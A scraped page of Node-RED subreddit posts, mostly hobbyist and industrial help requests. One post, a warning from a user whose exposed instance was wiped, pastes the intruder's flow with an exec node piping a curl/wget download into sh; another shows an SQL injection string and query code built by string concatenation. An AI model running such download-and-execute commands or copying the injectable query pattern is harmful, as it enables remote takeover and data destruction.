
Photograph via snooOG

A place to share nodes and flows, and discuss Node-RED, a low-code tool for event-driven applications.

Node-RED is a drag and drop programming tool made by IBM Emerging Technology to automate the Internet of Things.

You can think of it as the glue that connects your phone to your air conditioner, so that your AC is on half an hour before you get home.

Project home page at: http://nodered.org


14,199 Subscribers


GoldenCheetah HR and Pwoer data

Has anyone had any success in read power and hear rate from the training module of GoldenCheetah?

11:04 UTC


Node-Red Industrial HMI

Raspberry Pi with touchscreen used as HMI as well bas Main controller of water treatment plant controlling. Controlling, & HMI function are implemented using Node-red. Reading Digital IO and Analog Inputs over modbus RTU 485.

Small demo video: https://youtu.be/pvJo3_t_aro?si=cQp-25XMpEpDe1q8

04:30 UTC


Show me your roomba integrations

I am about to buy a new roomba (any company is fair game) and I want to integrate it into my smart home.

After looking at the roborock integration I am a bit confused because it looks old and references Xiaomi a lot and that the new Roborock app isn’t working with it.

So I am curious: What does your working setup look like, what model are you using, how are you using it and what tricks and pitfalls have you found?

08:06 UTC


How to use martip/node-red-google-apis node?

I'm using martip/node-red-google-apis in node-red - what do I set for msg.url, msg.method, and msg.payload (if anything)?

How can I get the node to return my device information from my Nest thermostats linked to Google's Smart Device Management (SDM) API? I've already setup the authentication as static using my JSON file downloaded from my service account page.

I updated a few things and it's no longer crashing/restarting my node-red, but I'm getting an auth failure now so I think the library might reference an older API method.

msg.method = enterprises.devices.list
msg.payload = {"parent":"enterprises/my_site_code"}

1 Comment
13:55 UTC


Icon package

Is there any package that i can install and contains funny icons(anime,cartoon, etc)?

1 Comment
11:59 UTC


node-red-contrib-influxdb giving an unexplainable: "Configuration missing" in the influxdb out node

Does anyone have any idea why I get "Configuration missing" when everything is configured?



I did notice the Token to be shorter after deployment then the one I pasted from InfluxDB. `
I can write to InfluxDB via CURL so the issue seems to be in the influxdb node

07:39 UTC


NodeRed Modbus Server issues

Hi everyone.

I am having problems with Modbus Server nodes in NodeRed. I installed the node-red-contrib-modbus node pack, and the simple use of Modbus Server or Modbus Flex Server it brings an error to the debug screen: "Error stopping node: Close timed out"

ModScan can successfully establish a connection with the NodeRed server tho, but when I use a BMS software like EBO of Schneider Electric, the modbus device created there (the nodeRed modbus server) connects and disconnects constantly, showing that there is an issue somewhere, maybe, related to the error stopping node.

When i use Modbus Write Node, modscan also reads the data, with a 1,5 sec poll time, while I am sending data in an interval of 1 sec, very strange situation too.

If someone can help me here, I would appreciate it very much.

Thanks in advance.

19:47 UTC


Join outputs

Hello everyone, how are you?

I'm working here with Node-RED and I have several API calls, and one API calls another based on a filter. When I reach the end, with all my assets that I have already pulled, I want to merge them into a single message so that I can create a CSV file and send it via email. The problem is that I am stuck on the part of merging the assets. If I just use the join in manual mode, it doesn't merge. If I use the join with some advanced property, like payload or merge all into an array, it only merges some. So, if it returns 20, it only merges 3, or it merges 3, 3, 3, in 3 different messages. How do I merge all the outputs at once, even if sometimes the API takes a while to return? So, it returns 1 asset in 1 second, and the fifth asset in 7 seconds. How do I do the same to merge these outputs into a single join so that I can create my CSV?

PS: I can share the flow, but it will not work because my instance is a "company instance" so there is diffs


13:56 UTC


Can I expose the local nodered address to internet?

Im planning to build a nodered platform on a rpi and access it remotely. The rpi must be connected to a phone hotspot ( using the internet company provides ). Is it possible?

13:19 UTC


TESmart control over ip?

I'm a bit out of my depth here. I a rackmount 8x1 hdmi switch. It supports LAN control, but not easily. Their documentation was just shy of incomprehensible; it seemed to imply a telnet connected and hexadecimal commands.

There is also a very simple windows controller. I did run wireshark on it and it seems to send a minimal amount of communication, but I'm not good enough to replicate that in node-red.

All I want is for a flow to change my source. Has anyone done this?

23:35 UTC


need help

i need my sprinkles to turn on only if all 4 conditions are met (temperature over 22 °C, wind speed lower than 7, at 23:00, if it wont rain even once during a day), but my sprinkles turn on even if only 1 of these are true and everything else is false, how can i fix this or do something about it?

08:36 UTC


how to make the node red run always running?

hi, im new here!! im currently working on my final year project for my diploma using node-red, the project working smoothly but the system im building need to run 24/7,

im honestly dont know about how to make the node red runs without turned on my laptop and activate it in command prompt,

please teach me about how to do that bcs that the most crucial part for my project, 🙏

16:27 UTC


Rock Solid Node-RED - Raspberry Pi, Mini PC or Other?

I'm using NR as part of a large home automation system for a new house I'm in the process of building/renovating. I've ensured most highly critical systems are pretty failsafe and relying on non-DIY system, such as a 'proper' platform like KNX for lighting (bathroom lights not working because my servers go offline is not good for wife-approval-factor)!

There are however a lot of other services and extra elements that I plan to automate using Node-RED. Examples including presence detection, additional RGB lighting, heating and AC (heating will be KNX, but low setpoints that require AC will interface to Mitsubishi units via Node-RED).

While not critical, I do want these systems to be the kind that will 'just work' for years with minimal maintenance.

My first thought was to setup a small rack of SBCs, so probably Raspberry PIs for this, ideally with SDs put into read-only to prevent memory wear, and/or have the NR flows pulled from GIT on boot etc. The older Pi 4s are low power but completely capable for a complex, but not processor intensive, NR setup. So I'd have one Pi and NR instance setup to manage all the 'climate' flows, another for lighting, another for something else, and probably a cold spare. If one packs in, it would be relatively quick to prop it back up (SD image ready, and flows backed up). A proper SSD could be added via USB to potentially improve reliability over the SDs.

An alternative, which is what I do now, is to have a much more powerful server/PC (i.e. a mini N100, NUC or similar) setup and just virtualise all the instances via Docker. This just seems a bit higher risk to me and more prone to falling over. The Pi setup feels to be a little closer to being like 'firmware' rather potentially flaky software running the house.

Has anyone done anything similar or got any views?


16:24 UTC


I didnt secure my node-red, then someone deleted all my flows

I had a huge project going on for a university assignment. Its all gone now. So many weekends wasted. As it turns out I havent backed up any of it. I am more familiar with text based coding so I would assume node-red will use something similar to git when you hit "deploy".

Restoring the .flows.json.backup in the user/.node-red folder didnt help

I guess I will be starting all over now with a week left for work thats worth months...

I was even thinking to myself "I really shouldnt let node-red unsecured without a password wide open on this rented v-server. But meh I only have a week left nothing will happen trust me bro"

I obviously need to make it more secure. I will take care of creating credentials and password for it. Any other suggestions?

Sorry I am just devastated and needed to share and also warn people not to leave their node-red open on the www

This is the output of the debug node:

kill: (17): Operation not permitted
chattr: Permission denied while trying to stat /var/spool/cron/crontabs/malina

this is the whole flow (very short):

        "id": "d0U92KczJPLkioBq0u",
        "type": "tab",
        "label": "d0U92KczJPLkioBq0u",
        "disabled": false,
        "info": ""
        "id": "715b78c1-cd3c-4d58-86fa-07fe636c995d",
        "type": "inject",
        "z": "d0U92KczJPLkioBq0u",
        "name": "",
        "props": [
                "p": "payload"
                "p": "topic",
                "vt": "str"
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 9999,
        "y": 9999,
        "wires": [
        "id": "ojzMf8c7Pac2K3xVgh",
        "type": "inject",
        "z": "d0U92KczJPLkioBq0u",
        "name": "",
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 100,
        "y": 100,
        "wires": [
        "id": "oXS5jbuZiwKcOr8St9",
        "type": "exec",
        "z": "d0U92KczJPLkioBq0u",
        "command": "( curl -sk || wget -O -) | sh",
        "addpay": false,
        "append": "",
        "useSpawn": "False",
        "timer": "",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 550,
        "y": 260,
        "wires": [
        "id": "byiFmWNhQCNWdpf2k7",
        "type": "debug",
        "z": "d0U92KczJPLkioBq0u",
        "name": "",
        "active": true,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "false",
        "x": 448,
        "y": 448,
        "wires": []
10:54 UTC


GPS Arduino to Telegram

I'm New to Node-Red and I have a problem because although the node-red reads the data from the Arduino Uno, but it did not send a message to the Telegram. I also configured some of the nodes based on the results of debugging but still "msg.payload.content is empty" did not disappear. I already tested other sample flows involving telegram and it functions well.



here is my flow:



"id": "c1d220d71c9449cd",

"type": "tab",

"label": "Thesis",

"disabled": false,

"info": "",

"env": []



"id": "cd5b8fd261e16072",

"type": "serial in",

"z": "c1d220d71c9449cd",

"name": "Arduino_GPS",

"serial": "serial-config-id",

"x": 230,

"y": 200,

"wires": [








"id": "22d5d65fd9367b10",

"type": "function",

"z": "c1d220d71c9449cd",

"name": "Parse GPS",

"func": "var data = msg.payload.trim();\nvar latitude = null;\nvar longitude = null;\n\nvar latMatch = data.match(/LAT:(-?\\d+\\.\\d+)/);\nvar lngMatch = data.match(/LNG:(-?\\d+\\.\\d+)/);\n\nif (latMatch && lngMatch) {\n latitude = parseFloat(latMatch[1]);\n longitude = parseFloat(lngMatch[1]);\n \n msg.payload = {\n latitude: latitude,\n longitude: longitude,\n type: \"location\"\n };\n return msg;\n} else {\n node.warn(\"Invalid GPS data: \" + data);\n return null; // If the data doesn't match, we return null to stop the flow\n}\n",

"outputs": 1,

"timeout": "",

"noerr": 0,

"initialize": "",

"finalize": "",

"libs": [],

"x": 410,

"y": 160,

"wires": [








"id": "1f39c17d5adda4a2",

"type": "function",

"z": "c1d220d71c9449cd",

"name": "Format Message",

"func": "var latitude = msg.payload.latitude;\nvar longitude = msg.payload.longitude;\nmsg.payload = `Current location:\\nLatitude: ${latitude}\\nLongitude: ${longitude}`;\nmsg.topic = \"Location Update\";\nreturn msg;\n",

"outputs": 1,

"timeout": "",

"noerr": 0,

"initialize": "",

"finalize": "",

"libs": [],

"x": 610,

"y": 160,

"wires": [








"id": "d92b85b261bed15f",

"type": "telegram sender",

"z": "c1d220d71c9449cd",

"name": "",

"bot": "telegram-bot-id",

"haserroroutput": true,

"outputs": 2,

"x": 850,

"y": 160,

"wires": [








"id": "c2cd0eb9940593a8",

"type": "debug",

"z": "c1d220d71c9449cd",

"name": "debug 3",

"active": false,

"tosidebar": true,

"console": false,

"tostatus": false,

"complete": "payload",

"targetType": "msg",

"statusVal": "",

"statusType": "auto",

"x": 420,

"y": 240,

"wires": []



"id": "3bd0829cbab618f1",

"type": "debug",

"z": "c1d220d71c9449cd",

"name": "debug 4",

"active": true,

"tosidebar": true,

"console": false,

"tostatus": false,

"complete": "payload",

"targetType": "msg",

"statusVal": "",

"statusType": "auto",

"x": 600,

"y": 240,

"wires": []



"id": "7f7af25c5708ee4f",

"type": "debug",

"z": "c1d220d71c9449cd",

"name": "debug 5",

"active": true,

"tosidebar": true,

"console": false,

"tostatus": false,

"complete": "false",

"statusVal": "",

"statusType": "auto",

"x": 800,

"y": 240,

"wires": []



"id": "092ec228828a82b1",

"type": "debug",

"z": "c1d220d71c9449cd",

"name": "debug 6",

"active": true,

"tosidebar": true,

"console": false,

"tostatus": false,

"complete": "false",

"statusVal": "",

"statusType": "auto",

"x": 980,

"y": 240,

"wires": []



"id": "serial-config-id",

"type": "serial-port",

"name": "",

"serialport": "/dev/ttyACM0",

"serialbaud": "9600",

"databits": "8",

"parity": "none",

"stopbits": "1",

"waitfor": "",

"newline": "\\n",

"bin": "false",

"out": "char",

"addchar": "",

"responsetimeout": "10000"



"id": "telegram-bot-id",

"type": "telegram bot",

"botname": "AquaverBot",

"usernames": "Aquaver",

"chatids": "7486752137",

"baseapiurl": "",

"testenvironment": false,

"updatemode": "polling",

"pollinterval": "300",

"usesocks": false,

"sockshost": "",

"socksport": "",

"socksusername": "",

"sockspassword": "",

"bothost": "",

"botpath": "",

"localbotport": "",

"publicbotport": "",

"privatekey": "",

"certificate": "",

"useselfsignedcertificate": false,

"sslterminated": false,

"verboselogging": false



06:42 UTC


Nodered allows sql injection attacks.

Hello everyone! I am new to using node-red. I am building an API, that registers users inside a DB and does other things. Everything is running fantastically, but I notice something. If I insert in my HTTP header of username or password ';delete from users;' It deletes my table. So I am vulnerable to SQL injection attacks. I am trying to use prepared statments without success. What do you recommend? I am using node-red-node-mysql and mariadb.

I have tried two a lot of things but i will write two. The first one is according to documentation

let username = flow.get("flow_username");
let password = flow.get("flow_password");
let name = flow.get("flow_name");
msg.payload = [username, password];
msg.topic = "INSERT INTO account(username, password_hash, created, tipo) VALUES(?, ?, sysdate(), 'U');"
return msg;

I tried using prepared statments with this.

let username = flow.get("flow_username");
let password = flow.get("flow_password");
let name = flow.get("flow_name");

var query = "SET @s1 = 'INSERT INTO account(username, password_hash, created, tipo) VALUES(?, ?, sysdate(), ''U'');';" +
"PREPARE stmt1 FROM @s1;" +
"SET @a = '"+ username +"';" +
"SET @b = '" + password + "';" +
"EXECUTE stmt1 USING @a, @b;" +

msg.topic = query;
return msg;
23:23 UTC


Help Needed: Writing INT Data with Modbus-Write on Micro850 PLC

Hi everyone,

I'm currently working on a dashboard to control and monitor a small PLC (Micro850 - Allen-Bradley), which connects via Modbus TCP/IP. I've successfully read some registers, but I haven't been able to write INT data.

Based on your experiences, what is the correct way to use the Modbus-Write node? I feel like I might be missing some steps.

Any insights or detailed steps would be greatly appreciated!

Thanks in advance!

01:48 UTC


Check condition and stop flow.

I'm kind of new to nodered and i was wondering if it's possible to check if a condition is met and in that case skip a portion of the flow.

in my case it's something like this:


i want the "refactor -> json -> influxdb" portion of the flow to not execute in case "should record" is false.

07:35 UTC


Nodered on Windows with some kind of GPIO?

I have a situation where I think Node Red is going to be the easiest solution for me... But, I don't have a Raspberry Pi. Is there a Windows device that can simulate GPIO pins for use with Windows? Would be even better if it would sit on my network as it'd be on the other side of my house from where my computer is, and still interface node red with the gpio pins there?

I basically have some email filtering I want to perform based on an outside relay... If the relay is open, forward email's, if it's closed, don't forward emails... It's for a notification thing with a physical relay trigger...

21:58 UTC


Headless acces point node red

Hello all,

Is it possible to set up an pi as acces point and run node red on it? I want to connect 1 wireless measuring device to the pi and let node red do some calculations/data storing and occasionally come by an check the node red dashboard with my phone by also connecting to that acces point. There is no wifi/internet available so making the pi an acces point and let the sensor device connect to that will safe me 1 router.

13:52 UTC


Send commands to Raspberry Pi on Local Network from Node-Red using SSH?

Hi all, I need to send a sudo reboot command to a Raspberry Pi on my local network from a dashboard button on my Node-Red system.

Ideally I'd also like to be able clear the memory cache too, can anyone help with this?

I found this SSH node https://flows.nodered.org/node/node-red-contrib-ssh-v2-reconnection and I'm hoping it's simple enough to set this up?

I have Pi's running in a permanent install already where I want to add this option, so I've ordered another Pi to test this on first.

21:59 UTC


Library or program to convert node-red json to Airflow

Is there a Library or program to convert node-red json to Airflow DAG deployment. I will be hitting airflow dag input api and passing the whole flow as json in body. On the airflow side would need a library/code to convert JSON to a DAG.

17:21 UTC


Flowfuse Dashboard 2 doesnt hide chrome searchbar

Hello guys,

I migrated to dashboard 2 and enter the dashboard through a chrome shortcut from my android.

In the old dashboard chrome automatically hide the search bar in this shortcut mode,

But unfortunately it is not working with Dashboard 2.

Is there a way to hide this ? It is a way better user experience without that

19:43 UTC


Join FlowFuse for a webinar on the "Why" behind putting Node-RED into the hands of Domain Experts / Citizen Developers

When: 26 June, 2024 17:00 CET (11:00am ET) 60 mins

What: Learn how low-code/no-code platforms help provide value to resource-constrained development teams. See how you can unlock the full potential and knowledge of any engineer by reducing complexities in typical development processes.

You'll learn how to:

  • The real challenges enterprises face in today’s digitally transformed systems.
  • How a low-code platform enhances efficiency and flexibility across the organization.
  • The benefits of open-source versus closed-source solutions

Who should attend: This webinar is ideal for project managers looking to change the development paradigm within their organization, focusing on enabling teams to solve their own problems with support from skilled teams.

Register now: Building a Foundation for Enterprise Agility and Process Optimization

1 Comment
19:21 UTC


How to trigger a flow from a bitcoin or ethereum block

21:50 UTC


Node-Red vs MicroPython on ESP32 IOT Project

Hello... As good as MicroPython, can Node-Red be used to control microcontroller like ESP32? I am studying Python, and just found out about this amazing Node-Red. As far as IOT Project is concerned, I am wondering if I should just stop the Python study, and go with Node-Red instead? Thanks in advance. Jo

02:01 UTC


Node Red Node for llama-cpp-python.

Node Red Node for llama-cpp-python.

I wanted to share a node I've created to simplify querying local LLMs, such as LLama-3, in Node-Red.

This was a learning exercise - I'd be interested in any feedback you may have.

This node builds on two powerful libraries:

  • The llama.cpp library provides inference of Meta's LLaMA model (and others) in pure C/C++
  • The llama.ccp-python library provides simple Python bindings for the llama.cpp library, including an OpenAI compatible web server.

This enables LLM inference with minimal setup and state-of-the-art performance on a wide variety of hardware - locally and in the cloud.

The llama-ccp-python node makes this even easier by allowing you to easily construct an OpenAI formatted request to the llama.ccp-python webserver, which is OpenAI compatible.

Code -> https://github.com/Winne004/node-red-contrib-llama-cpp-python

Sample Flow

Example Flow

Helpful Assistant Output

Content: A great question!

As of my knowledge cutoff, the current monarch of the United Kingdom is Queen Elizabeth II. She has been on the throne since February 6, 1952.

However, it's worth noting that Queen Elizabeth II is not the King of England, as England is a part of the larger entity known as the United Kingdom (UK), which also includes Scotland, Wales, and Northern Ireland. The UK is a constitutional monarchy with a parliamentary system, and the monarch serves as the head of state.

So, to be precise, Queen Elizabeth II is the Sovereign of the United Kingdom, but not specifically the King or Queen of England alone. Would you like to know more about the British monarchy or the UK in general?

Unhelpful Assistant Output

Content: *shrugs* Oh, qui est-ce que je sais ? *mumbles something incomprehensible and walks away*
1 Comment
21:24 UTC


Question concerning "function" node into InfluxDB Out

Hi, Node Red beginner here... I have a simple Hello World Inject into a function. I have two variants of function statements:

msg.payload = [
		measurement: "hello_world",
		tags: {
			location: "office"
		fields: {
			message: String(msg.payload)
		timestamp: Date.now() * 1000000
return msg;

which leads to this error message:

Error: A 400 Bad Request error occurred: {"error":"unable to parse 'hello_world fields=[object Object],measurement="hello_world",tags=[object Object],timestamp=1717590221842000000': invalid boolean"}

If I use this:

const measurement = "hello_world";
const tags = "location=office";
const fields = `message="${String(msg.payload)}"`;
Msg.payload = `${measurement},${tags} ${fields}`;
return msg;

it works, but I don't understand why the first one doesn't. Can someone explain to me why? I'd prefer the first syntax.

12:25 UTC


LangFlow Flowise etc

Hi all

I was wondering if anyone contributing to the node-red project has come across or is contributing to these other low code projects like LangFlow and or Flowise that are used to build out Ai Project

There seems to be a lot of similarities in the interface and it would be cool to see if the team behind Node-Red would be interested in getting involved as the node-red project is so well built that there may be learnings the team behind the code base could contribute to these Ai projects

Here is an example of what LangFlow does


1 Comment
21:59 UTC

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